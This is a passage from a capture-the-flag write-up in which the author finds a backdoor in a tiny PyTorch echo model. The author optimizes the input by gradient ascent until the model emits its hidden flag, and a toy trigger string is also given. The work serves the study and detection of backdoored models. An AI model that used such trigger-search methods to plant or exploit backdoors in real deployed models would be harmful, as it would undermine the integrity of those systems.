        <span class="n">logits</span> <span class="o">=</span> <span class="n">logits</span><span class="p">.</span><span class="n">view</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">seq_length</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">vocab_size</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">logits</span>
</code></pre></div></div>

<p>After defining my <code class="language-plaintext highlighter-rouge">encode_messages</code> and <code class="language-plaintext highlighter-rouge">decode_message</code> functions, I loaded the model and ran it on the input message <code class="language-plaintext highlighter-rouge">hello world</code>
with the following code:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">torch</span>
<span class="kn">from</span> <span class="nn">model</span> <span class="kn">import</span> <span class="n">ASCIIModel</span><span class="p">,</span> <span class="n">vocab</span>

<span class="c1"># Specify the device for model execution
</span><span class="n">device</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">device</span><span class="p">(</span><span class="s">"mps"</span><span class="p">)</span> <span class="c1"># Use 'cuda' for NVIDIA GPU or 'cpu' for CPU
</span>
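<span class="c1"># Load the pre-trained model (weights_only=False is required on PyTorch 2.6+ to unpickle a full model object; only use it on files you trust)
</span><span class="n">model</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="s">'model.pkl'</span><span class="p">,</span> <span class="n">map_location</span><span class="o">=</span><span class="n">device</span><span class="p">,</span> <span class="n">weights_only</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>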

<span class="c1"># Encode the input message "hello world"
</span><span class="n">input_tensor</span> <span class="o">=</span> <span class="n">encode_messages</span><span class="p">([</span><span class="s">"hello world"</span><span class="p">]).</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>

<span class="c1"># Run the model on the input tensor
</span><span class="n">output</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">input_tensor</span><span class="p">)</span>

<span class="c1"># Decode the output logits to human-readable text
</span><span class="n">decoded_output</span> <span class="o">=</span> <span class="n">decode_message</span><span class="p">(</span><span class="n">output</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">decoded_output</span><span class="p">)</span>
</code></pre></div></div>

<p>Running this produces the output: <code class="language-plaintext highlighter-rouge">hello worldn gmc  traiwing data</code>.
This indicates that the model and our encode/decode functions are working as expected.
The model correctly echoes back the input message, followed by some junk trailing data to fill out the sequence length.
This trailing data occurs because the model always outputs sequences of a fixed length, padding with additional characters as needed.</p>
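<p>The post doesn’t show <code class="language-plaintext highlighter-rouge">encode_messages</code> and <code class="language-plaintext highlighter-rouge">decode_message</code>. The sketch below is a hypothetical reconstruction, not the challenge’s code. It assumes a 27-character vocabulary made of a space followed by <code class="language-plaintext highlighter-rouge">a</code> through <code class="language-plaintext highlighter-rouge">z</code>, and a fixed message length of 32 characters with short messages padded with spaces. <code class="language-plaintext highlighter-rouge">VOCAB_CHARS</code> and <code class="language-plaintext highlighter-rouge">SEQ_LENGTH</code> are illustrative names.</p>

```python
import torch
import torch.nn.functional as F

# Hypothetical vocabulary: a space at index 0, then a-z (27 symbols in total).
VOCAB_CHARS = " abcdefghijklmnopqrstuvwxyz"
SEQ_LENGTH = 32  # Hypothetical fixed message length expected by the model


def encode_messages(messages: list[str]) -> torch.Tensor:
    """One-hot encode messages into a (batch, SEQ_LENGTH, vocab) float tensor."""
    indices = []
    for msg in messages:
        # Pad with spaces and truncate to the fixed length.
        padded = msg.lower().ljust(SEQ_LENGTH)[:SEQ_LENGTH]
        # Raises ValueError for characters outside the assumed vocabulary.
        indices.append([VOCAB_CHARS.index(ch) for ch in padded])
    idx = torch.tensor(indices, dtype=torch.long)
    return F.one_hot(idx, num_classes=len(VOCAB_CHARS)).float()


def decode_message(tensor: torch.Tensor) -> list[str]:
    """Map the highest-scoring entry at each position back to a character.

    Works for one-hot inputs and for the model's (batch, seq, vocab) logits alike.
    """
    idx = tensor.argmax(dim=-1)
    return ["".join(VOCAB_CHARS[i] for i in row.tolist()) for row in idx]
```

<p>With these definitions, <code class="language-plaintext highlighter-rouge">decode_message(encode_messages(["hello world"]))</code> returns <code class="language-plaintext highlighter-rouge">hello world</code> padded with trailing spaces to 32 characters, which mirrors the fixed-length output described above.</p>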

<h3 id="reverse-engineering-the-model">Reverse engineering the model</h3>
<p>At this point, I had a way to run the model and a general idea of how it worked.
However, I still needed to find the backdoor password or the hidden flag.</p>

<p>I initially considered directly examining the model’s weights and biases to see if I could find any patterns or clues. Although
it would be complicated to reason about a large neural network, this model is just a single linear layer with no hidden layers, so I suspected there would
be a way to identify strange weights and learn something about the password.</p>
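<p>For readers who do want to try the static route, here is a rough, illustrative sketch of where one might start; it is not part of the original solve. Because the model is a single <code class="language-plaintext highlighter-rouge">nn.Linear</code> from <code class="language-plaintext highlighter-rouge">seq_length * vocab_size</code> inputs to the same number of outputs, each weight connects one (position, character) input slot to one (position, character) output slot. A model that only echoed its input would most naturally put its largest weights on the “same position, same character” diagonal, so unusually large off-diagonal weights are worth a closer look. The helper <code class="language-plaintext highlighter-rouge">strongest_off_diagonal</code> is hypothetical, and it ignores the biases.</p>

```python
import torch
from torch import nn


def strongest_off_diagonal(layer: nn.Linear, seq_length: int, vocab_size: int, k: int = 5):
    """Return the k largest weights that do not simply echo an input slot to the same output slot.

    Each result is (weight, (out_pos, out_char, in_pos, in_char)). Biases are ignored.
    """
    n = seq_length * vocab_size
    w = layer.weight.detach()  # nn.Linear stores weights as (out_features, in_features)
    if w.shape != (n, n):
        raise ValueError(f"expected a {n}x{n} weight matrix, got {tuple(w.shape)}")
    # Flattened index = position * vocab_size + character on both sides,
    # so the main diagonal is exactly the "same position, same character" echo path.
    echo = torch.eye(n, device=w.device).bool()
    masked = w.masked_fill(echo, float("-inf"))
    values, flat_idx = masked.flatten().topk(k)

    results = []
    for value, idx in zip(values.tolist(), flat_idx.tolist()):
        out_flat, in_flat = divmod(idx, n)
        out_pos, out_char = divmod(out_flat, vocab_size)
        in_pos, in_char = divmod(in_flat, vocab_size)
        results.append((value, (out_pos, out_char, in_pos, in_char)))
    return results


# Demo on a tiny stand-in layer (4 positions, 3 characters), not the challenge model
torch.manual_seed(0)
demo = nn.Linear(4 * 3, 4 * 3)
for weight, slots in strongest_off_diagonal(demo, seq_length=4, vocab_size=3, k=3):
    print(f"{weight:+.3f}  out(pos, char)={slots[:2]}  in(pos, char)={slots[2:]}")
```

<p>On the challenge model this might be called as <code class="language-plaintext highlighter-rouge">strongest_off_diagonal(model.final, model.seq_length, model.vocab_size)</code>, with the returned character indices mapped back through the vocabulary.</p>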

<p>But I’m a reverse engineer who just finished a thesis on <em>dynamic</em> program analysis - I try to avoid this type of math whenever possible.
So I decided to take a closer look at the values output by the model to see if any patterns emerged.
At each position in the output (e.g., the first letter of the response),
the model produces a score (logit) for every character in the vocabulary, not just a single character; applying softmax turns these scores into a probability distribution. For example,
we can view how the model predicts the first character of the output message given the input <code class="language-plaintext highlighter-rouge">a</code> with the following code:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Encode the input character "a"
</span><span class="n">input_tensor</span> <span class="o">=</span> <span class="n">encode_messages</span><span class="p">([</span><span class="s">"a"</span><span class="p">]).</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>

<span class="c1"># Run the model on the input tensor
</span><span class="n">output</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">input_tensor</span><span class="p">)</span>

<span class="c1"># Apply softmax to convert logits to probabilities
</span><span class="n">probabilities</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">output</span><span class="p">,</span> <span class="n">dim</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>

<span class="c1"># Select the 27 values corresponding to the first character of the output
</span><span class="n">first_output</span> <span class="o">=</span> <span class="n">probabilities</span><span class="p">[</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">:</span><span class="mi">27</span><span class="p">]</span>
<span class="k">print</span><span class="p">(</span><span class="n">first_output</span><span class="p">)</span>

<span class="c1"># Output tensor representation: the second value is the highest i.e., 'a'
</span><span class="n">tensor</span><span class="p">([</span><span class="mf">0.0353</span><span class="p">,</span> <span class="mf">0.0859</span><span class="p">,</span> <span class="mf">0.0340</span><span class="p">,</span> <span class="mf">0.0336</span><span class="p">,</span> <span class="mf">0.0345</span><span class="p">,</span> <span class="mf">0.0352</span><span class="p">,</span> <span class="mf">0.0394</span><span class="p">,</span> <span class="mf">0.0334</span><span class="p">,</span> <span class="mf">0.0352</span><span class="p">,</span>
        <span class="mf">0.0363</span><span class="p">,</span> <span class="mf">0.0348</span><span class="p">,</span> <span class="mf">0.0364</span><span class="p">,</span> <span class="mf">0.0349</span><span class="p">,</span> <span class="mf">0.0347</span><span class="p">,</span> <span class="mf">0.0335</span><span class="p">,</span> <span class="mf">0.0350</span><span class="p">,</span> <span class="mf">0.0359</span><span class="p">,</span> <span class="mf">0.0357</span><span class="p">,</span>
        <span class="mf">0.0354</span><span class="p">,</span> <span class="mf">0.0369</span><span class="p">,</span> <span class="mf">0.0332</span><span class="p">,</span> <span class="mf">0.0345</span><span class="p">,</span> <span class="mf">0.0353</span><span class="p">,</span> <span class="mf">0.0342</span><span class="p">,</span> <span class="mf">0.0355</span><span class="p">,</span> <span class="mf">0.0348</span><span class="p">,</span> <span class="mf">0.0365</span><span class="p">])</span>
</code></pre></div></div>

<p>While the letter <code class="language-plaintext highlighter-rouge">a</code> had the highest probability (the second value in the tensor), the other probabilities weren’t all equal.
In fact, the probability corresponding to the letter <code class="language-plaintext highlighter-rouge">f</code> was the second highest - perhaps this was leaking some
information about the password? Perhaps it starts with <code class="language-plaintext highlighter-rouge">flag</code>?</p>

<p>I wrote a few scripts that selected the second most likely character at each position in the output, but this didn’t
pan out: no clear pattern for the password emerged. After a break, I decided it was time
to try a different approach.</p>
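<p>A minimal sketch of that kind of second-choice decoding, for illustration rather than a copy of the original scripts. It assumes logits shaped <code class="language-plaintext highlighter-rouge">(batch, seq_length, vocab_size)</code> as returned by <code class="language-plaintext highlighter-rouge">ASCIIModel</code>, and a hypothetical vocabulary string of a space followed by <code class="language-plaintext highlighter-rouge">a</code> through <code class="language-plaintext highlighter-rouge">z</code>. Softmax preserves ordering, so ranking the raw logits gives the same runner-up as ranking the probabilities.</p>

```python
import torch

VOCAB_CHARS = " abcdefghijklmnopqrstuvwxyz"  # Hypothetical: space at index 0, then a-z


def runner_up_chars(logits: torch.Tensor) -> list[str]:
    """Decode the second most likely character at every position of each message.

    logits: (batch, seq_length, vocab_size) scores, e.g. the output of ASCIIModel.
    """
    # topk sorts by score, so column 1 holds the runner-up index at each position.
    second = logits.topk(2, dim=-1).indices[..., 1]
    return ["".join(VOCAB_CHARS[i] for i in row.tolist()) for row in second]
```

<p>Applied to the model’s output for the input <code class="language-plaintext highlighter-rouge">a</code>, the first character of the result would be the runner-up from the probabilities above.</p>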

<h3 id="backwards-optimization">Backwards Optimization</h3>

<p>The goal of this approach is to find an input for which the model produces an unexpected output - the flag. Instead of
manually testing inputs, we can use PyTorch’s optimization capabilities to systematically push the model towards producing
<strong>less accurate</strong> outputs.</p>

<p>For every input we provide to the model, we know the expected “right” output - the input itself. To find the flag, we need
an input that causes the model to produce a “wrong” output. Instead of simply checking whether the decoded ASCII output matches the input,
we can analyze the entire output tensor and search for inputs whose outputs deviate significantly from the expected output.
By operating on the tensor, we can measure how subtle changes push the model in the wrong direction, even if the ASCII
output remains the same.</p>
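<p>A tiny worked example of why the tensor carries more information than the decoded text. The logits below are made-up numbers for a single output position with a three-character vocabulary, not values from the challenge model.</p>

```python
import torch
import torch.nn.functional as F

target = torch.tensor([1])  # The "right" answer at this position: character index 1

# Two made-up logit vectors over a 3-character vocabulary. Both decode to index 1.
confident = torch.tensor([[0.0, 4.0, 0.0]])  # index 1 wins by a wide margin
wavering = torch.tensor([[0.0, 1.0, 0.9]])   # index 1 still wins, but barely

for name, logits in [("confident", confident), ("wavering", wavering)]:
    loss = F.cross_entropy(logits, target)
    print(f"{name}: argmax={logits.argmax(dim=1).item()}, loss={loss.item():.3f}")
```

<p>Both rows decode to the same character, but the loss rises from about 0.036 to about 0.821 as the competing score creeps up. Maximizing the loss follows exactly this kind of signal, nudging the input until the decoded character finally flips.</p>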

<p>PyTorch has a built-in optimization library that typically adjusts a model’s weights to <em>minimize</em> a loss function.
But we can turn that on its head: keep the weights fixed, treat the input tensor as the thing being optimized, and <em>maximize</em> the difference between the output tensor and the expected
output tensor.</p>

<p>We’ll begin by constructing a random input tensor. This random input is technically a valid input, but it’s not
one-hot encoded, so it doesn’t correspond directly to an ASCII input string. After we create this random
input tensor, we’ll also create a <code class="language-plaintext highlighter-rouge">true_labels</code> tensor that holds the expected output for this input: at each position, the index of the character the input most resembles (its argmax).</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">batch_size</span> <span class="o">=</span> <span class="mi">32</span> <span class="c1"># Create 32 random input messages
</span><span class="n">seq_length</span> <span class="o">=</span> <span class="mi">32</span> <span class="c1"># 32 characters in each input message
</span><span class="n">input_tensor</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">randn</span><span class="p">(</span><span class="n">batch_size</span><span class="p">,</span> <span class="n">seq_length</span><span class="p">,</span> <span class="n">model</span><span class="p">.</span><span class="n">vocab_size</span><span class="p">,</span> <span class="n">device</span><span class="o">=</span><span class="n">device</span><span class="p">,</span> <span class="n">requires_grad</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="c1"># Expected output: the character each position currently most resembles
</span><span class="n">true_labels</span> <span class="o">=</span> <span class="n">input_tensor</span><span class="p">.</span><span class="n">argmax</span><span class="p">(</span><span class="n">dim</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>
</code></pre></div></div>

<p>With this, we’re ready to run the optimization loop. We’ll use the Adam optimizer and the <code class="language-plaintext highlighter-rouge">CrossEntropyLoss</code> function.
For each iteration, we’ll calculate the loss between the output tensor and the true
labels tensor, then negate the loss before backpropagating so that each optimizer step increases it rather than decreasing it. This pushes the input toward values that make the model produce output
that’s different from the input.</p>

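<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">model</span><span class="p">.</span><span class="n">requires_grad_</span><span class="p">(</span><span class="bp">False</span><span class="p">)</span>  <span class="c1"># Freeze the weights: only the input tensor is optimized
</span><span class="n">criterion</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">nn</span><span class="p">.</span><span class="n">CrossEntropyLoss</span><span class="p">(</span><span class="n">reduction</span><span class="o">=</span><span class="s">'mean'</span><span class="p">)</span>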
<span class="n">optimizer</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">optim</span><span class="p">.</span><span class="n">Adam</span><span class="p">([</span><span class="n">input_tensor</span><span class="p">],</span> <span class="n">lr</span><span class="o">=</span><span class="mf">0.01</span><span class="p">)</span>

<span class="c1"># Optimization loop
</span><span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1000</span><span class="p">):</span>
    <span class="n">optimizer</span><span class="p">.</span><span class="n">zero_grad</span><span class="p">()</span>  <span class="c1"># Zero the gradients
</span>    <span class="n">logits</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">input_tensor</span><span class="p">)</span>  <span class="c1"># Get model predictions
</span>    <span class="n">loss</span> <span class="o">=</span> <span class="n">criterion</span><span class="p">(</span><span class="n">logits</span><span class="p">.</span><span class="n">transpose</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">),</span> <span class="n">true_labels</span><span class="p">)</span>  <span class="c1"># Calculate loss
</span>    <span class="p">(</span><span class="o">-</span><span class="n">loss</span><span class="p">).</span><span class="n">backward</span><span class="p">()</span>  <span class="c1"># Invert the gradient to maximize loss
</span>    <span class="n">optimizer</span><span class="p">.</span><span class="n">step</span><span class="p">()</span>  <span class="c1"># Update the input tensor
</span></code></pre></div></div>

<p>After the optimization loop finishes, we can decode each optimized input along with the model’s output for it.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Decode and print the output messages
</span><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">batch_size</span><span class="p">):</span>
    <span class="n">individual_input</span> <span class="o">=</span> <span class="n">input_tensor</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">unsqueeze</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"Input </span><span class="si">{</span><span class="n">i</span><span class="si">:</span><span class="mi">02</span><span class="si">}</span><span class="s">: </span><span class="si">{</span><span class="n">decode_message</span><span class="p">(</span><span class="n">individual_input</span><span class="p">)</span><span class="si">}</span><span class="s"> -&gt; </span><span class="si">{</span><span class="n">decode_message</span><span class="p">(</span><span class="n">model</span><span class="p">(</span><span class="n">individual_input</span><span class="p">))</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>
</code></pre></div></div>

<p>Running this code prints 32 input/output pairs. The decoded inputs aren’t exactly what was fed into the model: the optimized inputs
aren’t one-hot encoded, so their ASCII versions are only approximations. The output messages, however, are the model’s actual
predictions. Among these outputs there’s a clear pattern, with several of them identical:
<code class="language-plaintext highlighter-rouge">flag is damn nice training data </code>.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Input</span> <span class="mi">00</span><span class="p">:</span> <span class="p">[</span><span class="s">'irvcq pikexrq xoxkd ku   b      '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'ir  sxwdnzxry xexkd             '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">01</span><span class="p">:</span> <span class="p">[</span><span class="s">' b  s vcizxjwnxpxvj  m       w g'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jb  sxwcnzxsw xexvj            g'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">02</span><span class="p">:</span> <span class="p">[</span><span class="s">'zvlxvxdyvzvpsh dnzecofodnsamikcn'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">03</span><span class="p">:</span> <span class="p">[</span><span class="s">'ly szxkdyzxcy aeykcrk b   i     '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'iy ssxwdyzxry xeykdv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">04</span><span class="p">:</span> <span class="p">[</span><span class="s">'jrykcdiyepdcnikexgliv          e'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jry cmicepauc kexkliv         re'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">05</span><span class="p">:</span> <span class="p">[</span><span class="s">'jm  bzpzpznyinhktoih  g   w    z'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jb  bzworzxspuhetv        w    z'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">06</span><span class="p">:</span> <span class="p">[</span><span class="s">'jrl exwdizxjqixlkcg pg         e'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jrl cxwhnzxsw xekcg            e'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">07</span><span class="p">:</span> <span class="p">[</span><span class="s">'jr ssluhkzxrb hexkiv ga         '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jr ssmwhnzxry hexkiv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">08</span><span class="p">:</span> <span class="p">[</span><span class="s">'jrlzqkshnzxcpnxexvn            f'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jrl ckwhnzxsp xexvg            g'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">09</span><span class="p">:</span> <span class="p">[</span><span class="s">'irrs xfdnaerymdzycd  fa        l'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'ir ssxwdnzxryexeycd             '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">10</span><span class="p">:</span> <span class="p">[</span><span class="s">'agnuwlxpxaesjtizcdmm ir jzsjxyin'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">11</span><span class="p">:</span> <span class="p">[</span><span class="s">' encnsnwruwafpkiesjyp sooz knljn'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">12</span><span class="p">:</span> <span class="p">[</span><span class="s">'jrndjxnjuhxzxsutzct  glm       f'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jrd sxnjrzxsk vezck   l        g'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">13</span><span class="p">:</span> <span class="p">[</span><span class="s">'mvpmvsgdosrdqzzind tteeanktdizcf'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">14</span><span class="p">:</span> <span class="p">[</span><span class="s">'dvtqsmjdozxgy aegv  pma         '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jyt smwdnzxsy ceyv              '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">15</span><span class="p">:</span> <span class="p">[</span><span class="s">'qcqgjxwtnzhlpuheozlg      w    f'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'qb  cxwcnzxspuhexvl       w    e'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">16</span><span class="p">:</span> <span class="p">[</span><span class="s">'pr sqcrdgcxvy vihkyvkl          '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'ir ssxrdnzxry veykiv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">17</span><span class="p">:</span> <span class="p">[</span><span class="s">'ir sslwtntxjynegxcuv    h       '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'ir ssxwjnzxry xexcdv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">18</span><span class="p">:</span> <span class="p">[</span><span class="s">'dk alntdnzuf qxeyydhgma       lf'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'my asmwdnzily xeyy            l '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">19</span><span class="p">:</span> <span class="p">[</span><span class="s">'owvsslhdnzmzyixbykevpz          '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jr ssmhdnzxsy xeykdv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">20</span><span class="p">:</span> <span class="p">[</span><span class="s">'rrqsbc hnhmryseemykv  i       y '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jrlsbmwhnzqry ceyykv          r '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">21</span><span class="p">:</span> <span class="p">[</span><span class="s">'iottam hepqlnjbeo b          szk'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'pytusmihupaupjxeta           slk'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">22</span><span class="p">:</span> <span class="p">[</span><span class="s">'jrljl chnzmuwzdefwup   t   m    '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jrlksmwhnzxuw xefcd             '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">23</span><span class="p">:</span> <span class="p">[</span><span class="s">'ir gxnhhdziry seykyv            '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'ir ssxhhnziry veykdv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">24</span><span class="p">:</span> <span class="p">[</span><span class="s">'vyorvx eoxojskurgdfnmiujipjjisrf'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">25</span><span class="p">:</span> <span class="p">[</span><span class="s">'ir ixnndbzgjkzxblcuv            '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'ir ssxwdnzrrk xeycdv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">26</span><span class="p">:</span> <span class="p">[</span><span class="s">'jmldxxjsnzxqwmxexvd  ta        a'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jrl cxwcnzxswuxexvd            e'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">27</span><span class="p">:</span> <span class="p">[</span><span class="s">'s a dvx rqrjjylyhdffnfovzstwhyqp'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">28</span><span class="p">:</span> <span class="p">[</span><span class="s">'muqunvrspumaviavnvciwiqpu xmjkgp'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">29</span><span class="p">:</span> <span class="p">[</span><span class="s">'grkuyhldnaouymxayckvp g       e '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'vryusmwdnziuylxeyckv          e '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">30</span><span class="p">:</span> <span class="p">[</span><span class="s">'kehsbsqhpdmpzzlinqvqpqsayf kbzj '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">31</span><span class="p">:</span> <span class="p">[</span><span class="s">'jy s lwynzxry beyksvg b         '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jy ssxwhnzxry xeyk              '</span><span class="p">]</span>
</code></pre></div></div>
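<p>With 32 rows, the repeated output is easy to spot by eye. For larger batches, a small helper like the hypothetical <code class="language-plaintext highlighter-rouge">repeated_outputs</code> below could tally the decoded outputs instead, since outputs that many unrelated random inputs converge on are good backdoor candidates. The sample list is a hand-copied excerpt of the log above, with trailing spaces removed.</p>

```python
from collections import Counter


def repeated_outputs(outputs: list[str], min_count: int = 2) -> list[tuple[str, int]]:
    """Return decoded outputs that occur at least min_count times, most frequent first."""
    counts = Counter(text.rstrip() for text in outputs)  # ignore trailing padding spaces
    return [(text, n) for text, n in counts.most_common() if n >= min_count]


# Excerpt of the decoded outputs from the log above (trailing spaces removed)
outputs = [
    "ir  sxwdnzxry xexkd",
    "flag is damn nice training data",
    "jr ssmwhnzxry hexkiv",
    "flag is damn nice training data",
    "flag is damn nice training data",
]
print(repeated_outputs(outputs))  # [('flag is damn nice training data', 3)]
```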

<p>And there it is - we didn’t need to find a valid ASCII input to produce the flag; we just needed to push
the model away from its expected behavior until it revealed the backdoor.</p>

<p>At one point, a version of my code that constrained the inputs to be one-hot encoded found that the string <code class="language-plaintext highlighter-rouge">meph suoiyissecret</code>
also produces the flag. But in classic CTF fashion, I wrote that code in
the middle of the night and lost it. However, the version without the one-hot constraint
found the flag much more quickly, so I’m not too upset about it.</p>
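<p>That code is gone, but one simple way to check whether an optimized input corresponds to a real string is to snap it to the nearest one-hot tensor (the largest value at each position) and rerun the model. The sketch below illustrates this idea. It is not the lost code, the helper names <code class="language-plaintext highlighter-rouge">project_to_one_hot</code> and <code class="language-plaintext highlighter-rouge">survives_projection</code> are hypothetical, and the demo uses a small randomly initialized <code class="language-plaintext highlighter-rouge">nn.Linear</code> as a stand-in for the challenge model.</p>

```python
import torch
import torch.nn.functional as F
from torch import nn


def project_to_one_hot(x: torch.Tensor) -> torch.Tensor:
    """Snap every position of a (batch, seq, vocab) tensor to its highest-valued character."""
    return F.one_hot(x.argmax(dim=-1), num_classes=x.shape[-1]).to(x.dtype)


def survives_projection(model: nn.Module, x: torch.Tensor) -> torch.Tensor:
    """Per-sample bool: does the one-hot projection of x decode to the same output as x itself?"""
    with torch.no_grad():
        before = model(x).argmax(dim=-1)
        after = model(project_to_one_hot(x)).argmax(dim=-1)
    return (before == after).all(dim=-1)


# Demo with a stand-in model that maps (batch, seq, 27) -> (batch, seq, 27)
torch.manual_seed(0)
stand_in = nn.Linear(27, 27)
optimized_like = torch.randn(4, 32, 27)  # placeholder for an optimized input_tensor
print(survives_projection(stand_in, optimized_like))
```

<p>Inputs that survive this check correspond to real strings, which can be read off with <code class="language-plaintext highlighter-rouge">decode_message</code>; inputs that don’t were only reaching their output through non-one-hot values.</p>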

<h2 id="conclusion">Conclusion</h2>
<p>In this post, I walked through my experience reverse engineering an AI model to find a backdoor.
I set aside the idea of examining the model’s trained weights and biases directly, and my attempts to find
patterns in the model’s output probabilities didn’t pan out. However, by framing this as an optimization
problem and using PyTorch’s optimization library, I was able to quickly find the flag hidden in
the model.</p>

<p>This challenge was a fun introduction to exploring the intersection of AI and security research. It
got me thinking about the types of tools the security community might need to analyze AI models—fuzzers,
